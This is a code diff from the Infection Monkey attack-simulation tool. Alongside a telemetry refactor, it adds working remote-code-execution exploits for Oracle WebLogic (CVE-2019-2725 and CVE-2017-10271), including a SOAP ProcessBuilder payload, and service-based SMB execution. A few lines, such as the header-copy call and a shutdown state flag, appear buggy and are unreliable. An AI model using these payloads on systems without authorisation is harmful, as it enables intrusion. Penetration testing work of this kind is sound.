forked from p15670423/monkey
Merge branch 'attack_module_load' into attack_execution_api
# Conflicts: # monkey/monkey_island/cc/services/attack/attack_report.py # monkey/monkey_island/cc/ui/src/components/report-components/AttackReport.js
This commit is contained in:
commit
648f6bee97
|
@ -20,33 +20,30 @@ class HostExploiter(object):
|
|||
|
||||
def __init__(self, host):
|
||||
self._config = infection_monkey.config.WormConfiguration
|
||||
self._exploit_info = {'display_name': self._EXPLOITED_SERVICE,
|
||||
self.exploit_info = {'display_name': self._EXPLOITED_SERVICE,
|
||||
'started': '',
|
||||
'finished': '',
|
||||
'vulnerable_urls': [],
|
||||
'vulnerable_ports': [],
|
||||
'executed_cmds': []}
|
||||
self._exploit_attempts = []
|
||||
self.exploit_attempts = []
|
||||
self.host = host
|
||||
|
||||
def set_start_time(self):
|
||||
self._exploit_info['started'] = datetime.now().isoformat()
|
||||
self.exploit_info['started'] = datetime.now().isoformat()
|
||||
|
||||
def set_finish_time(self):
|
||||
self._exploit_info['finished'] = datetime.now().isoformat()
|
||||
self.exploit_info['finished'] = datetime.now().isoformat()
|
||||
|
||||
def is_os_supported(self):
|
||||
return self.host.os.get('type') in self._TARGET_OS_TYPE
|
||||
|
||||
def send_exploit_telemetry(self, result):
|
||||
from infection_monkey.control import ControlClient
|
||||
ControlClient.send_telemetry(
|
||||
'exploit',
|
||||
{'result': result, 'machine': self.host.__dict__, 'exploiter': self.__class__.__name__,
|
||||
'info': self._exploit_info, 'attempts': self._exploit_attempts})
|
||||
from infection_monkey.telemetry.exploit_telem import ExploitTelem
|
||||
ExploitTelem(self, result).send()
|
||||
|
||||
def report_login_attempt(self, result, user, password='', lm_hash='', ntlm_hash='', ssh_key=''):
|
||||
self._exploit_attempts.append({'result': result, 'user': user, 'password': password,
|
||||
self.exploit_attempts.append({'result': result, 'user': user, 'password': password,
|
||||
'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key})
|
||||
|
||||
def exploit_host(self):
|
||||
|
@ -66,10 +63,10 @@ class HostExploiter(object):
|
|||
raise NotImplementedError()
|
||||
|
||||
def add_vuln_url(self, url):
|
||||
self._exploit_info['vulnerable_urls'].append(url)
|
||||
self.exploit_info['vulnerable_urls'].append(url)
|
||||
|
||||
def add_vuln_port(self, port):
|
||||
self._exploit_info['vulnerable_ports'].append(port)
|
||||
self.exploit_info['vulnerable_ports'].append(port)
|
||||
|
||||
def add_executed_cmd(self, cmd):
|
||||
"""
|
||||
|
@ -77,7 +74,7 @@ class HostExploiter(object):
|
|||
:param cmd: String of executed command. e.g. 'echo Example'
|
||||
"""
|
||||
powershell = True if "powershell" in cmd.lower() else False
|
||||
self._exploit_info['executed_cmds'].append({'cmd': cmd, 'powershell': powershell})
|
||||
self.exploit_info['executed_cmds'].append({'cmd': cmd, 'powershell': powershell})
|
||||
|
||||
|
||||
from infection_monkey.exploit.win_ms08_067 import Ms08_067_Exploiter
|
||||
|
|
|
@ -65,9 +65,9 @@ class SambaCryExploiter(HostExploiter):
|
|||
LOG.info("Writable shares and their credentials on host %s: %s" %
|
||||
(self.host.ip_addr, str(writable_shares_creds_dict)))
|
||||
|
||||
self._exploit_info["shares"] = {}
|
||||
self.exploit_info["shares"] = {}
|
||||
for share in writable_shares_creds_dict:
|
||||
self._exploit_info["shares"][share] = {"creds": writable_shares_creds_dict[share]}
|
||||
self.exploit_info["shares"][share] = {"creds": writable_shares_creds_dict[share]}
|
||||
self.try_exploit_share(share, writable_shares_creds_dict[share])
|
||||
|
||||
# Wait for samba server to load .so, execute code and create result file.
|
||||
|
@ -90,7 +90,7 @@ class SambaCryExploiter(HostExploiter):
|
|||
self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share])
|
||||
|
||||
for share, fullpath in successfully_triggered_shares:
|
||||
self._exploit_info["shares"][share]["fullpath"] = fullpath
|
||||
self.exploit_info["shares"][share]["fullpath"] = fullpath
|
||||
|
||||
if len(successfully_triggered_shares) > 0:
|
||||
LOG.info(
|
||||
|
|
|
@ -66,7 +66,7 @@ class ShellShockExploiter(HostExploiter):
|
|||
exploitable_urls = [url for url in exploitable_urls if url[0] is True]
|
||||
|
||||
# we want to report all vulnerable URLs even if we didn't succeed
|
||||
self._exploit_info['vulnerable_urls'] = [url[1] for url in exploitable_urls]
|
||||
self.exploit_info['vulnerable_urls'] = [url[1] for url in exploitable_urls]
|
||||
|
||||
# now try URLs until we install something on victim
|
||||
for _, url, header, exploit in exploitable_urls:
|
||||
|
|
|
@ -131,10 +131,12 @@ class SmbExploiter(HostExploiter):
|
|||
resp = scmr.hRCreateServiceW(scmr_rpc, sc_handle, self._config.smb_service_name, self._config.smb_service_name,
|
||||
lpBinaryPathName=cmdline)
|
||||
service = resp['lpServiceHandle']
|
||||
T1035Telem(ScanStatus.USED, "SMB exploiter ran the monkey by creating a service via MS-SCMR.").send()
|
||||
try:
|
||||
scmr.hRStartServiceW(scmr_rpc, service)
|
||||
T1035Telem(ScanStatus.USED, "SMB exploiter ran the monkey by creating a service via MS-SCMR.").send()
|
||||
except:
|
||||
T1035Telem(ScanStatus.SCANNED,
|
||||
"SMB exploiter failed to run the monkey by creating a service via MS-SCMR.").send()
|
||||
pass
|
||||
scmr.hRDeleteService(scmr_rpc, service)
|
||||
scmr.hRCloseServiceHandle(scmr_rpc, service)
|
||||
|
|
|
@ -1,3 +1,48 @@
|
|||
from __future__ import print_function
|
||||
import threading
|
||||
import logging
|
||||
import time
|
||||
import copy
|
||||
|
||||
from requests import post, exceptions
|
||||
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
|
||||
|
||||
from infection_monkey.exploit.web_rce import WebRCE
|
||||
from infection_monkey.exploit import HostExploiter
|
||||
from infection_monkey.exploit.tools import get_free_tcp_port, get_interface_to_target
|
||||
|
||||
|
||||
__author__ = "VakarisZ"
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
# How long server waits for get request in seconds
|
||||
SERVER_TIMEOUT = 4
|
||||
# How long should we wait after each request in seconds
|
||||
REQUEST_DELAY = 0.1
|
||||
# How long to wait for a sign(request from host) that server is vulnerable. In seconds
|
||||
REQUEST_TIMEOUT = 5
|
||||
# How long to wait for response in exploitation. In seconds
|
||||
EXECUTION_TIMEOUT = 15
|
||||
# Malicious requests' headers:
|
||||
HEADERS = {
|
||||
"Content-Type": "text/xml;charset=UTF-8",
|
||||
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
|
||||
"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
|
||||
}
|
||||
|
||||
|
||||
class WebLogicExploiter(HostExploiter):
|
||||
|
||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
||||
_EXPLOITED_SERVICE = 'Weblogic'
|
||||
|
||||
def _exploit_host(self):
|
||||
exploiters = [WebLogic20192725, WebLogic201710271]
|
||||
for exploiter in exploiters:
|
||||
if exploiter(self.host).exploit_host():
|
||||
return True
|
||||
|
||||
|
||||
# Exploit based of:
|
||||
# Kevin Kirsche (d3c3pt10n)
|
||||
# https://github.com/kkirsche/CVE-2017-10271
|
||||
|
@ -5,57 +50,29 @@
|
|||
# Luffin from Github
|
||||
# https://github.com/Luffin/CVE-2017-10271
|
||||
# CVE: CVE-2017-10271
|
||||
from __future__ import print_function
|
||||
from requests import post, exceptions
|
||||
from infection_monkey.exploit.web_rce import WebRCE
|
||||
from infection_monkey.exploit.tools import get_free_tcp_port, get_interface_to_target
|
||||
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
|
||||
class WebLogic201710271(WebRCE):
|
||||
URLS = ["/wls-wsat/CoordinatorPortType",
|
||||
"/wls-wsat/CoordinatorPortType11",
|
||||
"/wls-wsat/ParticipantPortType",
|
||||
"/wls-wsat/ParticipantPortType11",
|
||||
"/wls-wsat/RegistrationPortTypeRPC",
|
||||
"/wls-wsat/RegistrationPortTypeRPC11",
|
||||
"/wls-wsat/RegistrationRequesterPortType",
|
||||
"/wls-wsat/RegistrationRequesterPortType11"]
|
||||
|
||||
import threading
|
||||
import logging
|
||||
import time
|
||||
|
||||
__author__ = "VakarisZ"
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
# How long server waits for get request in seconds
|
||||
SERVER_TIMEOUT = 4
|
||||
# How long should be wait after each request in seconds
|
||||
REQUEST_DELAY = 0.0001
|
||||
# How long to wait for a sign(request from host) that server is vulnerable. In seconds
|
||||
REQUEST_TIMEOUT = 5
|
||||
# How long to wait for response in exploitation. In seconds
|
||||
EXECUTION_TIMEOUT = 15
|
||||
URLS = ["/wls-wsat/CoordinatorPortType",
|
||||
"/wls-wsat/CoordinatorPortType11",
|
||||
"/wls-wsat/ParticipantPortType",
|
||||
"/wls-wsat/ParticipantPortType11",
|
||||
"/wls-wsat/RegistrationPortTypeRPC",
|
||||
"/wls-wsat/RegistrationPortTypeRPC11",
|
||||
"/wls-wsat/RegistrationRequesterPortType",
|
||||
"/wls-wsat/RegistrationRequesterPortType11"]
|
||||
# Malicious request's headers:
|
||||
HEADERS = {
|
||||
"Content-Type": "text/xml;charset=UTF-8",
|
||||
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
|
||||
"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
|
||||
}
|
||||
|
||||
|
||||
class WebLogicExploiter(WebRCE):
|
||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
||||
_EXPLOITED_SERVICE = 'Weblogic'
|
||||
_TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE
|
||||
_EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE
|
||||
|
||||
def __init__(self, host):
|
||||
super(WebLogicExploiter, self).__init__(host, {'linux': '/tmp/monkey.sh',
|
||||
super(WebLogic201710271, self).__init__(host, {'linux': '/tmp/monkey.sh',
|
||||
'win32': 'monkey32.exe',
|
||||
'win64': 'monkey64.exe'})
|
||||
|
||||
def get_exploit_config(self):
|
||||
exploit_config = super(WebLogicExploiter, self).get_exploit_config()
|
||||
exploit_config = super(WebLogic201710271, self).get_exploit_config()
|
||||
exploit_config['blind_exploit'] = True
|
||||
exploit_config['stop_checking_urls'] = True
|
||||
exploit_config['url_extensions'] = URLS
|
||||
exploit_config['url_extensions'] = WebLogic201710271.URLS
|
||||
return exploit_config
|
||||
|
||||
def exploit(self, url, command):
|
||||
|
@ -66,8 +83,8 @@ class WebLogicExploiter(WebRCE):
|
|||
try:
|
||||
post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
|
||||
except Exception as e:
|
||||
print('[!] Connection Error')
|
||||
print(e)
|
||||
LOG.error("Connection error: %s" % e)
|
||||
return False
|
||||
|
||||
return True
|
||||
|
||||
|
@ -91,7 +108,7 @@ class WebLogicExploiter(WebRCE):
|
|||
if httpd.get_requests > 0:
|
||||
# Add all urls because we don't know which one is vulnerable
|
||||
self.vulnerable_urls.extend(urls)
|
||||
self._exploit_info['vulnerable_urls'] = self.vulnerable_urls
|
||||
self.exploit_info['vulnerable_urls'] = self.vulnerable_urls
|
||||
else:
|
||||
LOG.info("No vulnerable urls found, skipping.")
|
||||
|
||||
|
@ -196,6 +213,7 @@ class WebLogicExploiter(WebRCE):
|
|||
Http server built to wait for GET requests. Because oracle web logic vuln is blind,
|
||||
we determine if we can exploit by either getting a GET request from host or not.
|
||||
"""
|
||||
|
||||
def __init__(self, local_ip, local_port, lock, max_requests=1):
|
||||
self.local_ip = local_ip
|
||||
self.local_port = local_port
|
||||
|
@ -212,6 +230,7 @@ class WebLogicExploiter(WebRCE):
|
|||
def do_GET():
|
||||
LOG.info('Server received a request from vulnerable machine')
|
||||
self.get_requests += 1
|
||||
|
||||
LOG.info('Server waiting for exploited machine request...')
|
||||
httpd = HTTPServer((self.local_ip, self.local_port), S)
|
||||
httpd.daemon = True
|
||||
|
@ -224,3 +243,82 @@ class WebLogicExploiter(WebRCE):
|
|||
|
||||
def stop(self):
|
||||
self._stopped = True
|
||||
|
||||
|
||||
# Exploit based of:
|
||||
# Andres Rodriguez (acamro)
|
||||
# https://github.com/rapid7/metasploit-framework/pull/11780
|
||||
class WebLogic20192725(WebRCE):
|
||||
URLS = ["_async/AsyncResponseServiceHttps"]
|
||||
|
||||
_TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE
|
||||
_EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE
|
||||
|
||||
def __init__(self, host):
|
||||
super(WebLogic20192725, self).__init__(host)
|
||||
|
||||
def get_exploit_config(self):
|
||||
exploit_config = super(WebLogic20192725, self).get_exploit_config()
|
||||
exploit_config['url_extensions'] = WebLogic20192725.URLS
|
||||
exploit_config['blind_exploit'] = True
|
||||
exploit_config['dropper'] = True
|
||||
return exploit_config
|
||||
|
||||
def exploit(self, url, command):
|
||||
if 'linux' in self.host.os['type']:
|
||||
payload = self.get_exploit_payload('/bin/sh', '-c', command)
|
||||
else:
|
||||
payload = self.get_exploit_payload('cmd', '/c', command)
|
||||
try:
|
||||
resp = post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT)
|
||||
return resp
|
||||
except Exception as e:
|
||||
LOG.error("Connection error: %s" % e)
|
||||
return False
|
||||
|
||||
def check_if_exploitable(self, url):
|
||||
headers = copy.deepcopy(HEADERS).update({'SOAPAction': ''})
|
||||
res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT)
|
||||
if res.status_code == 500 and "<faultcode>env:Client</faultcode>" in res.text:
|
||||
return True
|
||||
else:
|
||||
return False
|
||||
|
||||
@staticmethod
|
||||
def get_exploit_payload(cmd_base, cmd_opt, command):
|
||||
"""
|
||||
Formats the payload used to exploit weblogic servers
|
||||
:param cmd_base: What command prompt to use eg. cmd
|
||||
:param cmd_opt: cmd_base commands parameters. eg. /c (to run command)
|
||||
:param command: command itself
|
||||
:return: Formatted payload
|
||||
"""
|
||||
empty_payload = '''
|
||||
<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"
|
||||
xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">
|
||||
<soapenv:Header>
|
||||
<wsa:Action>xx</wsa:Action>
|
||||
<wsa:RelatesTo>xx</wsa:RelatesTo>
|
||||
<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">
|
||||
<void class=\"java.lang.ProcessBuilder\">
|
||||
<array class=\"java.lang.String\" length=\"3\">
|
||||
<void index=\"0\">
|
||||
<string>{cmd_base}</string>
|
||||
</void>
|
||||
<void index=\"1\">
|
||||
<string>{cmd_opt}</string>
|
||||
</void>
|
||||
<void index=\"2\">
|
||||
<string>{cmd_payload}</string>
|
||||
</void>
|
||||
</array>
|
||||
<void method=\"start\"/>
|
||||
</void>
|
||||
</work:WorkContext>
|
||||
</soapenv:Header>
|
||||
<soapenv:Body>
|
||||
<asy:onAsyncDelivery/>
|
||||
</soapenv:Body>
|
||||
</soapenv:Envelope>'''
|
||||
payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
|
||||
return payload
|
||||
|
|
|
@ -16,6 +16,12 @@ from infection_monkey.network.network_scanner import NetworkScanner
|
|||
from infection_monkey.system_info import SystemInfoCollector
|
||||
from infection_monkey.system_singleton import SystemSingleton
|
||||
from infection_monkey.telemetry.attack.victim_host_telem import VictimHostTelem
|
||||
from infection_monkey.telemetry.attack.t1107_telem import T1107Telem
|
||||
from infection_monkey.telemetry.scan_telem import ScanTelem
|
||||
from infection_monkey.telemetry.state_telem import StateTelem
|
||||
from infection_monkey.telemetry.system_info_telem import SystemInfoTelem
|
||||
from infection_monkey.telemetry.trace_telem import TraceTelem
|
||||
from infection_monkey.telemetry.tunnel_telem import TunnelTelem
|
||||
from infection_monkey.windows_upgrader import WindowsUpgrader
|
||||
from infection_monkey.post_breach.post_breach_handler import PostBreach
|
||||
from common.utils.attack_utils import ScanStatus
|
||||
|
@ -109,24 +115,23 @@ class InfectionMonkey(object):
|
|||
if monkey_tunnel:
|
||||
monkey_tunnel.start()
|
||||
|
||||
ControlClient.send_telemetry("state", {'done': False})
|
||||
StateTelem(False).send()
|
||||
|
||||
self._default_server = WormConfiguration.current_server
|
||||
LOG.debug("default server: %s" % self._default_server)
|
||||
ControlClient.send_telemetry("tunnel", {'proxy': ControlClient.proxies.get('https')})
|
||||
TunnelTelem().send()
|
||||
|
||||
if WormConfiguration.collect_system_info:
|
||||
LOG.debug("Calling system info collection")
|
||||
system_info_collector = SystemInfoCollector()
|
||||
system_info = system_info_collector.get_info()
|
||||
ControlClient.send_telemetry("system_info_collection", system_info)
|
||||
SystemInfoTelem(system_info).send()
|
||||
|
||||
# Executes post breach actions
|
||||
PostBreach().execute()
|
||||
|
||||
if 0 == WormConfiguration.depth:
|
||||
LOG.debug("Reached max depth, shutting down")
|
||||
ControlClient.send_telemetry("trace", "Reached max depth, shutting down")
|
||||
TraceTelem("Reached max depth, shutting down").send()
|
||||
return
|
||||
else:
|
||||
LOG.debug("Running with depth: %d" % WormConfiguration.depth)
|
||||
|
@ -157,8 +162,7 @@ class InfectionMonkey(object):
|
|||
machine, finger.__class__.__name__)
|
||||
finger.get_host_fingerprint(machine)
|
||||
|
||||
ControlClient.send_telemetry('scan', {'machine': machine.as_dict(),
|
||||
'service_count': len(machine.services)})
|
||||
ScanTelem(machine).send()
|
||||
|
||||
# skip machines that we've already exploited
|
||||
if machine in self._exploited_machines:
|
||||
|
@ -175,8 +179,11 @@ class InfectionMonkey(object):
|
|||
if monkey_tunnel:
|
||||
monkey_tunnel.set_tunnel_for_host(machine)
|
||||
if self._default_server:
|
||||
machine.set_default_server(get_interface_to_target(machine.ip_addr) +
|
||||
(':'+self._default_server_port if self._default_server_port else ''))
|
||||
if self._network.on_island(self._default_server):
|
||||
machine.set_default_server(get_interface_to_target(machine.ip_addr) +
|
||||
(':'+self._default_server_port if self._default_server_port else ''))
|
||||
else:
|
||||
machine.set_default_server(self._default_server)
|
||||
LOG.debug("Default server: %s set to machine: %r" % (self._default_server, machine))
|
||||
|
||||
# Order exploits according to their type
|
||||
|
@ -223,14 +230,13 @@ class InfectionMonkey(object):
|
|||
InfectionMonkey.close_tunnel()
|
||||
firewall.close()
|
||||
else:
|
||||
ControlClient.send_telemetry("state", {'done': True}) # Signal the server (before closing the tunnel)
|
||||
StateTelem(False).send() # Signal the server (before closing the tunnel)
|
||||
InfectionMonkey.close_tunnel()
|
||||
firewall.close()
|
||||
if WormConfiguration.send_log_to_server:
|
||||
self.send_log()
|
||||
self._singleton.unlock()
|
||||
|
||||
utils.remove_monkey_dir()
|
||||
InfectionMonkey.self_delete()
|
||||
LOG.info("Monkey is shutting down")
|
||||
|
||||
|
@ -243,6 +249,9 @@ class InfectionMonkey(object):
|
|||
|
||||
@staticmethod
|
||||
def self_delete():
|
||||
status = ScanStatus.USED if utils.remove_monkey_dir() else ScanStatus.SCANNED
|
||||
T1107Telem(status, utils.get_monkey_dir_path()).send()
|
||||
|
||||
if WormConfiguration.self_delete_in_cleanup \
|
||||
and -1 == sys.executable.find('python'):
|
||||
try:
|
||||
|
@ -256,8 +265,10 @@ class InfectionMonkey(object):
|
|||
close_fds=True, startupinfo=startupinfo)
|
||||
else:
|
||||
os.remove(sys.executable)
|
||||
T1107Telem(ScanStatus.USED, sys.executable).send()
|
||||
except Exception as exc:
|
||||
LOG.error("Exception in self delete: %s", exc)
|
||||
T1107Telem(ScanStatus.SCANNED, sys.executable).send()
|
||||
|
||||
def send_log(self):
|
||||
monkey_log_path = utils.get_monkey_log_path()
|
||||
|
|
|
@ -118,3 +118,6 @@ class NetworkScanner(object):
|
|||
if NetworkRange.get_range_obj(subnet_str).is_in_range(ip_address):
|
||||
return True
|
||||
return False
|
||||
|
||||
def on_island(self, server):
|
||||
return bool([x for x in self._ip_addresses if x in server])
|
||||
|
|
|
@ -2,6 +2,7 @@ import logging
|
|||
import subprocess
|
||||
import socket
|
||||
from infection_monkey.control import ControlClient
|
||||
from infection_monkey.telemetry.post_breach_telem import PostBreachTelem
|
||||
from infection_monkey.utils import is_windows_os
|
||||
from infection_monkey.config import WormConfiguration
|
||||
|
||||
|
@ -45,12 +46,7 @@ class PBA(object):
|
|||
"""
|
||||
exec_funct = self._execute_default
|
||||
result = exec_funct()
|
||||
hostname = socket.gethostname()
|
||||
ControlClient.send_telemetry('post_breach', {'command': self.command,
|
||||
'result': result,
|
||||
'name': self.name,
|
||||
'hostname': hostname,
|
||||
'ip': socket.gethostbyname(hostname)})
|
||||
PostBreachTelem(self, result).send()
|
||||
|
||||
def _execute_default(self):
|
||||
"""
|
||||
|
|
|
@ -0,0 +1,19 @@
|
|||
from infection_monkey.telemetry.attack.attack_telem import AttackTelem
|
||||
|
||||
|
||||
class T1107Telem(AttackTelem):
|
||||
def __init__(self, status, path):
|
||||
"""
|
||||
T1107 telemetry.
|
||||
:param status: ScanStatus of technique
|
||||
:param path: Path of deleted dir/file
|
||||
"""
|
||||
super(T1107Telem, self).__init__('T1107', status)
|
||||
self.path = path
|
||||
|
||||
def get_data(self):
|
||||
data = super(T1107Telem, self).get_data()
|
||||
data.update({
|
||||
'path': self.path
|
||||
})
|
||||
return data
|
|
@ -0,0 +1,27 @@
|
|||
from infection_monkey.telemetry.base_telem import BaseTelem
|
||||
|
||||
__author__ = "itay.mizeretz"
|
||||
|
||||
|
||||
class ExploitTelem(BaseTelem):
|
||||
|
||||
def __init__(self, exploiter, result):
|
||||
"""
|
||||
Default exploit telemetry constructor
|
||||
:param exploiter: The instance of exploiter used
|
||||
:param result: The result from the 'exploit_host' method.
|
||||
"""
|
||||
super(ExploitTelem, self).__init__()
|
||||
self.exploiter = exploiter
|
||||
self.result = result
|
||||
|
||||
telem_category = 'exploit'
|
||||
|
||||
def get_data(self):
|
||||
return {
|
||||
'result': self.result,
|
||||
'machine': self.exploiter.host.__dict__,
|
||||
'exploiter': self.exploiter.__class__.__name__,
|
||||
'info': self.exploiter.exploit_info,
|
||||
'attempts': self.exploiter.exploit_attempts
|
||||
}
|
|
@ -0,0 +1,40 @@
|
|||
import socket
|
||||
|
||||
from infection_monkey.telemetry.base_telem import BaseTelem
|
||||
|
||||
__author__ = "itay.mizeretz"
|
||||
|
||||
|
||||
class PostBreachTelem(BaseTelem):
|
||||
|
||||
def __init__(self, pba, result):
|
||||
"""
|
||||
Default post breach telemetry constructor
|
||||
:param pba: Post breach action which was used
|
||||
:param result: Result of PBA
|
||||
"""
|
||||
super(PostBreachTelem, self).__init__()
|
||||
self.pba = pba
|
||||
self.result = result
|
||||
self.hostname, self.ip = PostBreachTelem._get_hostname_and_ip()
|
||||
|
||||
telem_category = 'post_breach'
|
||||
|
||||
def get_data(self):
|
||||
return {
|
||||
'command': self.pba.command,
|
||||
'result': self.result,
|
||||
'name': self.pba.name,
|
||||
'hostname': self.hostname,
|
||||
'ip': self.ip
|
||||
}
|
||||
|
||||
@staticmethod
|
||||
def _get_hostname_and_ip():
|
||||
try:
|
||||
hostname = socket.gethostname()
|
||||
ip = socket.gethostbyname(hostname)
|
||||
except socket.error:
|
||||
hostname = "Unknown"
|
||||
ip = "Unknown"
|
||||
return hostname, ip
|
|
@ -0,0 +1,22 @@
|
|||
from infection_monkey.telemetry.base_telem import BaseTelem
|
||||
|
||||
__author__ = "itay.mizeretz"
|
||||
|
||||
|
||||
class ScanTelem(BaseTelem):
|
||||
|
||||
def __init__(self, machine):
|
||||
"""
|
||||
Default scan telemetry constructor
|
||||
:param machine: Scanned machine
|
||||
"""
|
||||
super(ScanTelem, self).__init__()
|
||||
self.machine = machine
|
||||
|
||||
telem_category = 'scan'
|
||||
|
||||
def get_data(self):
|
||||
return {
|
||||
'machine': self.machine.as_dict(),
|
||||
'service_count': len(self.machine.services)
|
||||
}
|
|
@ -0,0 +1,19 @@
|
|||
from infection_monkey.telemetry.base_telem import BaseTelem
|
||||
|
||||
__author__ = "itay.mizeretz"
|
||||
|
||||
|
||||
class StateTelem(BaseTelem):
|
||||
|
||||
def __init__(self, is_done):
|
||||
"""
|
||||
Default state telemetry constructor
|
||||
:param is_done: Whether the state of monkey is done.
|
||||
"""
|
||||
super(StateTelem, self).__init__()
|
||||
self.is_done = is_done
|
||||
|
||||
telem_category = 'state'
|
||||
|
||||
def get_data(self):
|
||||
return {'done': self.is_done}
|
|
@ -0,0 +1,19 @@
|
|||
from infection_monkey.telemetry.base_telem import BaseTelem
|
||||
|
||||
__author__ = "itay.mizeretz"
|
||||
|
||||
|
||||
class SystemInfoTelem(BaseTelem):
|
||||
|
||||
def __init__(self, system_info):
|
||||
"""
|
||||
Default system info telemetry constructor
|
||||
:param system_info: System info returned from SystemInfoCollector.get_info()
|
||||
"""
|
||||
super(SystemInfoTelem, self).__init__()
|
||||
self.system_info = system_info
|
||||
|
||||
telem_category = 'system_info'
|
||||
|
||||
def get_data(self):
|
||||
return self.system_info
|
|
@ -0,0 +1,26 @@
|
|||
import logging
|
||||
|
||||
from infection_monkey.telemetry.base_telem import BaseTelem
|
||||
|
||||
__author__ = "itay.mizeretz"
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class TraceTelem(BaseTelem):
|
||||
|
||||
def __init__(self, msg):
|
||||
"""
|
||||
Default trace telemetry constructor
|
||||
:param msg: Trace message
|
||||
"""
|
||||
super(TraceTelem, self).__init__()
|
||||
self.msg = msg
|
||||
LOG.debug("Trace: %s" % msg)
|
||||
|
||||
telem_category = 'trace'
|
||||
|
||||
def get_data(self):
|
||||
return {
|
||||
'msg': self.msg
|
||||
}
|
|
@ -0,0 +1,19 @@
|
|||
from infection_monkey.control import ControlClient
|
||||
from infection_monkey.telemetry.base_telem import BaseTelem
|
||||
|
||||
__author__ = "itay.mizeretz"
|
||||
|
||||
|
||||
class TunnelTelem(BaseTelem):
|
||||
|
||||
def __init__(self):
|
||||
"""
|
||||
Default tunnel telemetry constructor
|
||||
"""
|
||||
super(TunnelTelem, self).__init__()
|
||||
self.proxy = ControlClient.proxies.get('https')
|
||||
|
||||
telem_category = 'tunnel'
|
||||
|
||||
def get_data(self):
|
||||
return {'proxy': self.proxy}
|
|
@ -49,8 +49,13 @@ def create_monkey_dir():
|
|||
def remove_monkey_dir():
|
||||
"""
|
||||
Removes monkey's root directory
|
||||
:return True if removed without errors and False otherwise
|
||||
"""
|
||||
shutil.rmtree(get_monkey_dir_path(), ignore_errors=True)
|
||||
try:
|
||||
shutil.rmtree(get_monkey_dir_path())
|
||||
return True
|
||||
except Exception:
|
||||
return False
|
||||
|
||||
|
||||
def get_monkey_dir_path():
|
||||
|
|
|
@ -2,8 +2,8 @@
|
|||
Define a Document Schema for the Monkey document.
|
||||
"""
|
||||
import mongoengine
|
||||
from mongoengine import Document, StringField, ListField, BooleanField, EmbeddedDocumentField, DateField, \
|
||||
ReferenceField
|
||||
from mongoengine import Document, StringField, ListField, BooleanField, EmbeddedDocumentField, ReferenceField, \
|
||||
DateTimeField
|
||||
|
||||
from monkey_island.cc.models.monkey_ttl import MonkeyTtl
|
||||
|
||||
|
@ -24,8 +24,8 @@ class Monkey(Document):
|
|||
hostname = StringField()
|
||||
internet_access = BooleanField()
|
||||
ip_addresses = ListField(StringField())
|
||||
keepalive = DateField()
|
||||
modifytime = DateField()
|
||||
keepalive = DateTimeField()
|
||||
modifytime = DateTimeField()
|
||||
# TODO change this to an embedded document as well - RN it's an unnamed tuple which is confusing.
|
||||
parent = ListField(ListField(StringField()))
|
||||
config_error = BooleanField()
|
||||
|
@ -41,6 +41,10 @@ class Monkey(Document):
|
|||
except IndexError:
|
||||
raise MonkeyNotFoundError("id: {0}".format(str(db_id)))
|
||||
|
||||
@staticmethod
|
||||
def get_latest_modifytime():
|
||||
return Monkey.objects.order_by('-modifytime').first().modifytime
|
||||
|
||||
def is_dead(self):
|
||||
monkey_is_dead = False
|
||||
if self.dead:
|
||||
|
|
|
@ -79,7 +79,7 @@ class Telemetry(flask_restful.Resource):
|
|||
monkey_label = telem_monkey_guid
|
||||
x["monkey"] = monkey_label
|
||||
objects.append(x)
|
||||
if x['telem_category'] == 'system_info_collection' and 'credentials' in x['data']:
|
||||
if x['telem_category'] == 'system_info' and 'credentials' in x['data']:
|
||||
for user in x['data']['credentials']:
|
||||
if -1 != user.find(','):
|
||||
new_user = user.replace(',', '.')
|
||||
|
@ -277,7 +277,7 @@ TELEM_PROCESS_DICT = \
|
|||
'state': Telemetry.process_state_telemetry,
|
||||
'exploit': Telemetry.process_exploit_telemetry,
|
||||
'scan': Telemetry.process_scan_telemetry,
|
||||
'system_info_collection': Telemetry.process_system_info_telemetry,
|
||||
'system_info': Telemetry.process_system_info_telemetry,
|
||||
'trace': Telemetry.process_trace_telemetry,
|
||||
'post_breach': Telemetry.process_post_breach_telemetry,
|
||||
'attack': Telemetry.process_attack_telemetry
|
||||
|
|
|
@ -78,13 +78,13 @@ class TelemetryFeed(flask_restful.Resource):
|
|||
|
||||
@staticmethod
|
||||
def get_trace_telem_brief(telem):
|
||||
return 'Monkey reached max depth.'
|
||||
return 'Trace: %s' % telem['data']['msg']
|
||||
|
||||
@staticmethod
|
||||
def get_post_breach_telem_brief(telem):
|
||||
return '%s post breach action executed on %s (%s) machine' % (telem['data']['name'],
|
||||
telem['data']['hostname'],
|
||||
telem['data']['ip'])
|
||||
return '%s post breach action executed on %s (%s) machine.' % (telem['data']['name'],
|
||||
telem['data']['hostname'],
|
||||
telem['data']['ip'])
|
||||
|
||||
@staticmethod
|
||||
def get_attack_telem_brief(telem):
|
||||
|
